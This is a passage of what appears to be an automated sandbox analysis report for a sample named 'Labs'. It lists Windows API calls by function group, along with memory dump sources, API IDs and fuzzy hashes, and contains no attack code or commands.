                                                    • GetProcAddress.KERNEL32(00000000), ref: 007942AF
                                                    • EncodePointer.KERNEL32(00000000), ref: 007942BA
                                                    • DecodePointer.KERNEL32(007941A8), ref: 007942D5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                    • String ID: RoUninitialize$combase.dll
                                                    • API String ID: 3489934621-2819208100
                                                    • Opcode ID: 4dce3c010445c160c912bc076f0c97e7aa75ed326e3d70dbb35f718144b19438
                                                    • Instruction ID: 73c10ee5443920a48a4df86cb26a2c73426d2166b8fac0fb237be9eaab7a1f80
                                                    • Opcode Fuzzy Hash: 4dce3c010445c160c912bc076f0c97e7aa75ed326e3d70dbb35f718144b19438
                                                    • Instruction Fuzzy Hash: CEE0E270AA0B00EFEF929F60ED0DF493AA8BB84B42F50491AF401E52F0CBB84604DF10
                                                    APIs
                                                    • GetClientRect.USER32(?,?), ref: 007721B8
                                                    • GetWindowRect.USER32(?,?), ref: 007721F9
                                                    • ScreenToClient.USER32(?,?), ref: 00772221
                                                    • GetClientRect.USER32(?,?), ref: 00772350
                                                    • GetWindowRect.USER32(?,?), ref: 00772369
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Rect$Client$Window$Screen
                                                    • String ID:
                                                    • API String ID: 1296646539-0
                                                    • Opcode ID: 71a73744a5983a8f510bbac48105732f3db591594bf4ab43c75fee4cc763c2e6
                                                    • Instruction ID: 5827d3ede4af3e7a94b387d5f6fd704febe272e12fa4b9a441f2f1005f3516c1
                                                    • Opcode Fuzzy Hash: 71a73744a5983a8f510bbac48105732f3db591594bf4ab43c75fee4cc763c2e6
                                                    • Instruction Fuzzy Hash: ADB17C39900249DBDF10CFA8C8807EDB7B1FF48350F14C129ED69AB256DB38AA51CB64
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _memmove$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 3253778849-0
                                                    • Opcode ID: 51ab40fe22c4e2fb00421c61a35dbb705e6c79181faffba7ee17a0808551edfc
                                                    • Instruction ID: 1254f15c8b12d485f667728a52ee4906b7ac48ca30353520c9300c192f5b4349
                                                    • Opcode Fuzzy Hash: 51ab40fe22c4e2fb00421c61a35dbb705e6c79181faffba7ee17a0808551edfc
                                                    • Instruction Fuzzy Hash: DB61D27010025ADBCF11EF64CC89EFE37B8AF05344F44855AF8595B292DB39AD15CB60
                                                    APIs
                                                      • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                      • Part of subcall function 007F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007F040D,?,?), ref: 007F1491
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F091D
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007F095D
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007F0980
                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007F09A9
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 007F09EC
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 007F09F9
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                    • String ID:
                                                    • API String ID: 4046560759-0
                                                    • Opcode ID: 53e37409855f936aa4017490f05efe465f5b19d2c0ce04ee7f2a7ec9d4c37e5e
                                                    • Instruction ID: bede39900993e2392fba508e53c1539aeda91d857ee2b7110873f00f5628ad01
                                                    • Opcode Fuzzy Hash: 53e37409855f936aa4017490f05efe465f5b19d2c0ce04ee7f2a7ec9d4c37e5e
                                                    • Instruction Fuzzy Hash: D0516A31208204EFD714EF64C889E6EBBE9FF84314F44491DF595872A2EB79E905CB92
                                                    APIs
                                                    • GetMenu.USER32(?), ref: 007F5E38
                                                    • GetMenuItemCount.USER32(00000000), ref: 007F5E6F
                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007F5E97
                                                    • GetMenuItemID.USER32(?,?), ref: 007F5F06
                                                    • GetSubMenu.USER32(?,?), ref: 007F5F14
                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 007F5F65
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountMessagePostString
                                                    • String ID:
                                                    • API String ID: 650687236-0
                                                    • Opcode ID: ba7153c0abb76a2dbb39f4ad98f73f1ebeb96306f838d1826fa4ba612d8a8819
                                                    • Instruction ID: abe60b418d55f0ab2690125cca28c1bf3d042596cfa39b9bced4df210a03893e
                                                    • Opcode Fuzzy Hash: ba7153c0abb76a2dbb39f4ad98f73f1ebeb96306f838d1826fa4ba612d8a8819
                                                    • Instruction Fuzzy Hash: D6516C75A01A19EFCF11EF64C845ABEB7B5EF48320F104099EA15BB351CB39AE418B91
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 007CF6A2
                                                    • VariantClear.OLEAUT32(00000013), ref: 007CF714
                                                    • VariantClear.OLEAUT32(00000000), ref: 007CF76F
                                                    • _memmove.LIBCMT ref: 007CF799
                                                    • VariantClear.OLEAUT32(?), ref: 007CF7E6
                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007CF814
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                    • String ID:
                                                    • API String ID: 1101466143-0
                                                    • Opcode ID: 4aa03f397e6b4d60c4f0e630f04786a20c8010d9d5aa7b9106a650cb08d6ee1d
                                                    • Instruction ID: 195a592a906f3587658c03644e44daff33477804b57effce5b09548b49d1d662
                                                    • Opcode Fuzzy Hash: 4aa03f397e6b4d60c4f0e630f04786a20c8010d9d5aa7b9106a650cb08d6ee1d
                                                    • Instruction Fuzzy Hash: 925145B5A00209EFCB14CF58C884EAAB7B9FF48314B15856EE959DB301E734E911CFA0
                                                    APIs
                                                    • _memset.LIBCMT ref: 007D29FF
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D2A4A
                                                    • IsMenu.USER32(00000000), ref: 007D2A6A
                                                    • CreatePopupMenu.USER32 ref: 007D2A9E
                                                    • GetMenuItemCount.USER32(000000FF), ref: 007D2AFC
                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007D2B2D
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                    • String ID:
                                                    • API String ID: 3311875123-0
                                                    • Opcode ID: 684f57caaca25c02586c606a875be9547f4657ca4a0e4ab81dda02706c3099f2
                                                    • Instruction ID: 03a9a3c86763343e53206d159f83420273dab05981b7a6e2cb3c102761373366
                                                    • Opcode Fuzzy Hash: 684f57caaca25c02586c606a875be9547f4657ca4a0e4ab81dda02706c3099f2
                                                    • Instruction Fuzzy Hash: EC519070600249DBCF25CF68D888BAEBBF4EF64318F14415BE8119B392E7B49947CB51
                                                    APIs
                                                      • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00771B76
                                                    • GetWindowRect.USER32(?,?), ref: 00771BDA
                                                    • ScreenToClient.USER32(?,?), ref: 00771BF7
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00771C08
                                                    • EndPaint.USER32(?,?), ref: 00771C52
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                    • String ID:
                                                    • API String ID: 1827037458-0
                                                    • Opcode ID: 7f8a86c8c16cc83b253053c3344a7af467fe41c0389617010c8f7955450099b4
                                                    • Instruction ID: e90ce0139bb70356ced26a1138882f408d5607f9f538fd5b5af0a363ba9b8fd9
                                                    • Opcode Fuzzy Hash: 7f8a86c8c16cc83b253053c3344a7af467fe41c0389617010c8f7955450099b4
                                                    • Instruction Fuzzy Hash: E641D7701043049FDB21DF68CC88FB67BE8FB95360F144669FA69872A2C735D805DB61
                                                    APIs
                                                    • ShowWindow.USER32(008377B0,00000000,01204CE8,?,?,008377B0,?,007FBC1A,?,?), ref: 007FBD84
                                                    • EnableWindow.USER32(?,00000000), ref: 007FBDA8
                                                    • ShowWindow.USER32(008377B0,00000000,01204CE8,?,?,008377B0,?,007FBC1A,?,?), ref: 007FBE08
                                                    • ShowWindow.USER32(?,00000004,?,007FBC1A,?,?), ref: 007FBE1A
                                                    • EnableWindow.USER32(?,00000001), ref: 007FBE3E
                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 007FBE61
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$Enable$MessageSend
                                                    • String ID:
                                                    • API String ID: 642888154-0
                                                    • Opcode ID: 137564108c8492962a1d5b3e1b4c8de325c7f1e5e5d0cd1d0f89a0f6a25a42a9
                                                    • Instruction ID: 5491d2de2835ff8de5ebdc56cd7096a704b4cbd1a487374b0bdbd23f6fe06a40
                                                    • Opcode Fuzzy Hash: 137564108c8492962a1d5b3e1b4c8de325c7f1e5e5d0cd1d0f89a0f6a25a42a9
                                                    • Instruction Fuzzy Hash: 97414D34704148EFDB22CF28C489BE47BE5BF05315F1841A9EB588F3A2CB36A845CB51
                                                    APIs
                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,007E550C,?,?,00000000,00000001), ref: 007E7796
                                                      • Part of subcall function 007E406C: GetWindowRect.USER32(?,?), ref: 007E407F
                                                    • GetDesktopWindow.USER32 ref: 007E77C0
                                                    • GetWindowRect.USER32(00000000), ref: 007E77C7
                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 007E77F9
                                                      • Part of subcall function 007D57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5877
                                                    • GetCursorPos.USER32(?), ref: 007E7825
                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007E7883
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                    • String ID:
                                                    • API String ID: 4137160315-0
                                                    • Opcode ID: b4ea3bb488fa792ddcca8008f00e67a597d41ed30492d57ebce14fe5e97693b8
                                                    • Instruction ID: f6d863f5de0f9353ae632654df5b20a0ffd05f03ed3f5836dcbca7ce2dafe2cf
                                                    • Opcode Fuzzy Hash: b4ea3bb488fa792ddcca8008f00e67a597d41ed30492d57ebce14fe5e97693b8
                                                    • Instruction Fuzzy Hash: 2731D072509345ABD724DF54CC49F9BB7EAFF88314F00091AF589A7181CB35E908CBA2
                                                    APIs
                                                      • Part of subcall function 007C8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007C8CDE
                                                      • Part of subcall function 007C8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007C8CE8
                                                      • Part of subcall function 007C8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007C8CF7
                                                      • Part of subcall function 007C8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007C8CFE
                                                      • Part of subcall function 007C8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007C8D14
                                                    • GetLengthSid.ADVAPI32(?,00000000,007C904D), ref: 007C9482
                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007C948E
                                                    • HeapAlloc.KERNEL32(00000000), ref: 007C9495
                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 007C94AE
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,007C904D), ref: 007C94C2
                                                    • HeapFree.KERNEL32(00000000), ref: 007C94C9
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                    • String ID:
                                                    • API String ID: 3008561057-0
                                                    • Opcode ID: 5612a0702ab23a6bad026991420cdac9b8b62e969d086954d7aa8028bf37e1c8
                                                    • Instruction ID: 98551a5dc50a0d2c2469251153e97e1b2598828895ab043686800aaad71b1d74
                                                    • Opcode Fuzzy Hash: 5612a0702ab23a6bad026991420cdac9b8b62e969d086954d7aa8028bf37e1c8
                                                    • Instruction Fuzzy Hash: BF117C72601A04EFDB989FA4CC0DFAF7BB9FB45316F10815CE94597210D73A9A41CB60
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007C9200
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 007C9207
                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 007C9216
                                                    • CloseHandle.KERNEL32(00000004), ref: 007C9221
                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007C9250
                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 007C9264
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                    • String ID:
                                                    • API String ID: 1413079979-0
                                                    • Opcode ID: 83679ed29a8da12412918f2019bec48daf121c058d52d0c06a1c8ef86f020e58
                                                    • Instruction ID: 40fa40429c0c83fa7adb81385bdb9f637665f50a28dc5656554a14b595d2ba89
                                                    • Opcode Fuzzy Hash: 83679ed29a8da12412918f2019bec48daf121c058d52d0c06a1c8ef86f020e58
                                                    • Instruction Fuzzy Hash: BA11477250120EABDB428F94ED4DFDA7BA9FB08705F084018FA44A2160D67A9D60EB60
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 007CC34E
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 007CC35F
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007CC366
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 007CC36E
                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 007CC385
                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 007CC397
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CapsDevice$Release
                                                    • String ID:
                                                    • API String ID: 1035833867-0
                                                    • Opcode ID: c66b370d6a2fcc1e8f11a10805e5f4177ca00e374eb5264bbec625851e88bdd7
                                                    • Instruction ID: 74847ffe22bdffe2fe57299b0f89321bb0649f174872479d8cf3c986bd7d2452
                                                    • Opcode Fuzzy Hash: c66b370d6a2fcc1e8f11a10805e5f4177ca00e374eb5264bbec625851e88bdd7
                                                    • Instruction Fuzzy Hash: 16014475E00718BBEF509BA59C49F5EBFB8EF58751F004069FA08AB280DA719D10CFA1
                                                    APIs
                                                      • Part of subcall function 007716CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00771729
                                                      • Part of subcall function 007716CF: SelectObject.GDI32(?,00000000), ref: 00771738
                                                      • Part of subcall function 007716CF: BeginPath.GDI32(?), ref: 0077174F
                                                      • Part of subcall function 007716CF: SelectObject.GDI32(?,00000000), ref: 00771778
                                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 007FC57C
                                                    • LineTo.GDI32(00000000,00000003,?), ref: 007FC590
                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007FC59E
                                                    • LineTo.GDI32(00000000,00000000,?), ref: 007FC5AE
                                                    • EndPath.GDI32(00000000), ref: 007FC5BE
                                                    • StrokePath.GDI32(00000000), ref: 007FC5CE
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                    • String ID:
                                                    • API String ID: 43455801-0
                                                    • Opcode ID: 6e6e130aaf6fada8f3144dc450e95f3de2bedff48ae84295fb79fe145dae14f4
                                                    • Instruction ID: c4dd12537f8e33327ef34ecece6d883ab7b9a776961c2181bd87884d6c7f210c
                                                    • Opcode Fuzzy Hash: 6e6e130aaf6fada8f3144dc450e95f3de2bedff48ae84295fb79fe145dae14f4
                                                    • Instruction Fuzzy Hash: E311DB7600410DBFDF129F94DC88FAA7FADFB08354F148461BA185A160D771AE55DFA0
                                                    APIs
                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 007907EC
                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 007907F4
                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007907FF
                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0079080A
                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00790812
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0079081A
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Virtual
                                                    • String ID:
                                                    • API String ID: 4278518827-0
                                                    • Opcode ID: 187a1eaf741d2541484f5ea4a272ff233b6fa14218ebd992a8ed2ccc4c77ce2e
                                                    • Instruction ID: bb64d7764dcb9969b405d931db7b892506f508fbba79cb7a9c71b77e7a0dfde4
                                                    • Opcode Fuzzy Hash: 187a1eaf741d2541484f5ea4a272ff233b6fa14218ebd992a8ed2ccc4c77ce2e
                                                    • Instruction Fuzzy Hash: D3016CB09017597DE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A864CFE5
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007D59B4
                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007D59CA
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 007D59D9
                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007D59E8
                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007D59F2
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007D59F9
                                                    Memory Dump Source
